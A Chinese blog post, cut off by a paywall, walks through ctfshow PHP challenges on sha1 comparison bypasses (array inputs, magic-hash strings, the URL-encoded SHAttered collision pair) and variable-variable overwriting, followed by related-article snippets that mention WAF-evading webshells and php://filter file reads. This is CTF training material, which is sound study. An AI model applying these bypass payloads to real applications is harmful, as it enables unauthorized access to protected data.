php特性<2>--ctfshow

最新推荐文章于 2025-04-07 11:43:32 发布
最新推荐文章于 2025-04-07 11:43:32 发布
阅读量2.5k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF训练日记 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/unexpectedthing/article/details/121088037

文章目录

1.sha1的绕过

web104,106

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
   
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
   
        echo $flag;
    }
}

利用了sha1弱类型比较,跟MD5加密是一样的

利用数组绕过或者弱类型绕过

payload

GET:v2[]=1
POST:v1[]=2
还有一些字符串
aaroZmOk
aaK1STfY
aaO8zKZF
aa3OFF9m

如果是强类型转换

if(sha1($v1)===sha1($v2) && $v1!=$v2){
   
        echo $flag;
    }
使用数组绕过,v1[]=1&v2[]=2

但是还有一种,直接把数组过滤了

if(is_array($_GET['name']) || is_array($_GET['password']))
        die('There is no way you can sneak me, young man!');
 else if (sha1($_GET['name']) === sha1($_GET['password']))
      	echo $flag;

我们不能用数组了

还有一种payload

name=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&password=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

2.php变量覆盖

web105

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
   
    if($key==='error'){
   
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
   
    if($value==='flag'){
   
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
   
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

首先审计代码,先读懂 k e y = key= key=value

<?php
$a='hello';
$$a='world';
echo $a.${
   $a};
?>
输出helloworld
$$a
最低0.47元/天 解锁文章
【红日Day7-CTF】parse_str函数缺陷漏洞
PZ的博客
01-13 1934
练习记录 复现代码: index.php <?php $a = "hongri"; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { echo '<a href="flag.php">flag is here</a...
ctfshow-web101(php特性)
m0_62094846的博客
01-14 735
反射类ReflectionClass <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php")
ctfshow web入门 php特性
Sentiment的博客
04-11 5780
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTF--变量1
最新发布
2401_83809941的博客
04-07 328
潜在的安全漏洞:代码注入漏洞——通过eval函数,攻击者可以执行任意PHP代码,如果args=GLOBALS,args等价于$GLOBALS,攻击者可能访问全局变量。风险:eval函数会直接执行用户输入的代码,可能导致代码注入攻击。风险:这会让代码中的错误(如语法错误、未定义变量等)不会显示出来,不利于调试。关键点:这会直接将PHP代码以高亮形式输出到网页上,可能暴露服务器路径信息(如文件路径中的敏感目录)。风险:如果攻击者能访问该文件,可能获取敏感信息。作用:高亮显示当前文件(即这段代码本身)的内容。
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6440
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
CTF php特性(中)
2301_81556781的博客
07-26 1030
所以用匿名类绕过?&v2=a 或者是?我们最终要得到 $flag 的值,就需要 var_dump($$v1) 中的 $v1 为 flag,即 $v2 要为 flag,这样 $$v2 就为 $flag,&$$v2 就为 $flag 对应的值。要想跨过词法作用域的限制,可以用 GLOBALS 常量数组,其中包含了 $flag 键值对,就可以将 $flag 的值赋给 $$v1。num=%0c36 此时$num不等于36,且为数字,trim以后也不等于36,且'\x0c36'=='36'
ctf中的web的PHP问题,Ctfshow Web入门 - PHP特性(89-102
weixin_28909295的博客
04-01 1143
Web89include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}}num数组绕过?num[]=0Web90includ...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web97-100 php特性
qq_52671379的博客
03-28 605
ctfshow web97-php特性
CTFshow web(php特性93-96)
csjjjd的博客
02-02 1152
这里还是不能匹配到字母,而且要绕过强相等,思路肯定是使用进制转化法的,不然会匹配到字母的,还是?num=010574但是提交的时候当成字符串了对面也是字符串,直接转化后强相等了,这里其实很简单,只要在前面加点啥的,别让他们强相等就好了,绕过强相等直接在前面加个+或者空格或者%0a(换行符)这在编写可移植脚本或应用时特别有用,因为你无需假设文件的绝对位置,只需根据当前工作目录的相对位置来指定路径。这里不能匹配字母,弱相等4476,所以还是同样的思路,进制转化,?糟了,那接下怎么办?这不就断了思路了吗?
ctfshow php特性
m0_63253040的博客
08-01 400
有个正则匹配0-9数字,,输出flag的条件是要变量num为整数,直接用数组绕过就行了。
ctfshowPHP特性
cosmoslin的博客
09-14 2666
PHP特性ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
ctfshow 大赛原题 web689--web695
2301_81040377的博客
08-01 1242
path这里可以写入文件这里的%26是但是如果直接写的话不能正确的绕过,必须写url形式写马方便。
php反序列化之字符逃逸
qq_53856457的博客
05-14 2155
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
php 变量覆盖 ctf,CTF-代码审计(1)——parse_str()变量覆盖
weixin_34801390的博客
03-27 930
题目连接:http://222.18.158.226:7000/iscc.php考点:parse_str()变量覆盖代码:PHP知识点:1.parse_url()参照网址:https://www.php.net/manual/zh/function.parse-url.php2.$_SERVER[]参考网址:https://php.net/manual/zh/reserved.variables....
ctf刷题小结
quan9i的博客
05-15 6909
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
ctfshow 基础补web入门PHP特性102开始
giaogiao123的博客
06-06 794
<?php highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; $v4 = is_numeric($v2) and is_numeric($v3); if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str); }
php代码审计题目总结
qq_45927819的博客
12-14 1901
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page))//判断.
php特性 ctfshow
02-14
### PHP 特性 PHP 提供了一系列内置函数用于处理文件操作,其中 `highlight_file` 函数能够高亮显示给定文件的内容并将其作为源代码展示。然而,在某些情况下,该函数的行为可能被特定条件影响: - 当传入的参数无法通过 `is_file` 检测时,即当目标不是常规文件的情况下,仍然会尝试调用 `highlight_file` 来解析输入[^3]。 这种行为可以通过利用 PHP 的伪协议来绕过一些安全检查机制。例如,使用 `php://filter/resource=` 结构可以让服务器认为请求的是一个特殊资源而非实际存在的物理文件,从而实现读取指定文件的目的。 ```php // 利用 php 伪协议读取 flag.php 文件内容 $file = 'php://filter/resource=flag.php'; if (!is_file($file)) { highlight_file($file); } else { echo "hacker!"; } ``` ### CTFShow 平台介绍 CTFShow 是一个专注于网络安全竞赛训练的学习型社区平台,提供了多种类型的挑战题目供用户练习,特别是 Web 安全领域内的漏洞挖掘与防护技术。对于初学者而言,这里有许多基础级别的任务可以帮助熟悉常见的攻击手法以及防御措施[^2]。 #### 使用教程和技巧 为了更好地理解和解决平台上发布的各类问题,建议掌握以下几个方面的能力: 1. **理解 HTTP 请求方法** - 掌握如何发送不同类型的HTTP请求(GET/POST),这有助于分析服务端逻辑并寻找潜在的安全隐患。 2. **学习常见Web漏洞原理** - 包括SQL注入、命令执行、文件包含等高级话题,这些都是构建稳固应用程序所必需的知识点。 3. **实践编码技能** - 尝试编写简单的脚本来自动化测试过程,比如构造恶意负载(payload),这对于提高效率非常有帮助[^1]。 4. **研究官方文档和其他资料** - 阅读 PHP 手册以及其他权威指南,深入了解语言特性和框架内部工作方式,以便更精准地定位问题所在。 5. **参与讨论交流** - 积极加入社区论坛或聊天群组分享经验心得,与其他爱好者共同探讨解决方案,往往能获得意想不到的帮助和支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值